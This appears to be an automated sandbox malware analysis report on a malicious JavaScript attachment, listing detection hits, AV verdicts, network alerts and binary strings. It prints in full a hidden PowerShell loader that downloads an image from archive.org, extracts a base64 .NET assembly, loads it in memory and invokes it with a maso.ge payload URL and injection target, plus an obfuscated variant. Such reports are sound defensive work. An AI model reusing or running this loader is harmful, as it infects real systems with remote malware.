        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ?

        Data Obfuscation

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?

        Suricata Signatures

        Timestamp:2024-08-12T11:37:07.077733+0200
        SID:2049038
        Severity:1
        Source Port:443
        Destination Port:49704
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        • AV Detection
        • Compliance
        • Software Vulnerabilities
        • Networking
        • System Summary
        • Data Obfuscation
        • Boot Survival
        • Hooking and other Techniques for Hiding and Protection
        • Malware Analysis System Evasion
        • HIPS / PFW / Operating System Protection Evasion
        • Language, Device and Operating System Detection

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: https://maso.ge/wp-admin/sky.txtAvira URL Cloud: Label: malware
        Source: http://maso.geAvira URL Cloud: Label: malware
        Source: https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpgAvira URL Cloud: Label: malware
        Source: https://maso.geAvira URL Cloud: Label: malware
        Source: maso.geVirustotal: Detection: 13%Perma Link
        Source: https://maso.ge/wp-admin/sky.txtVirustotal: Detection: 11%Perma Link
        Source: https://maso.geVirustotal: Detection: 13%Perma Link
        Source: http://maso.geVirustotal: Detection: 13%Perma Link
        Source: 15514541_Doc_Sub(C-A0893)10-08-2024.jsVirustotal: Detection: 12%Perma Link
        Source: unknownHTTPS traffic detected: 207.241.227.86:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 195.54.178.4:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdbX source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2221743469.000001C26C9C9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.2214644675.000001C26A778000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: mscorlib.pdbdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000004.00000002.2221743469.000001C26C9C9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
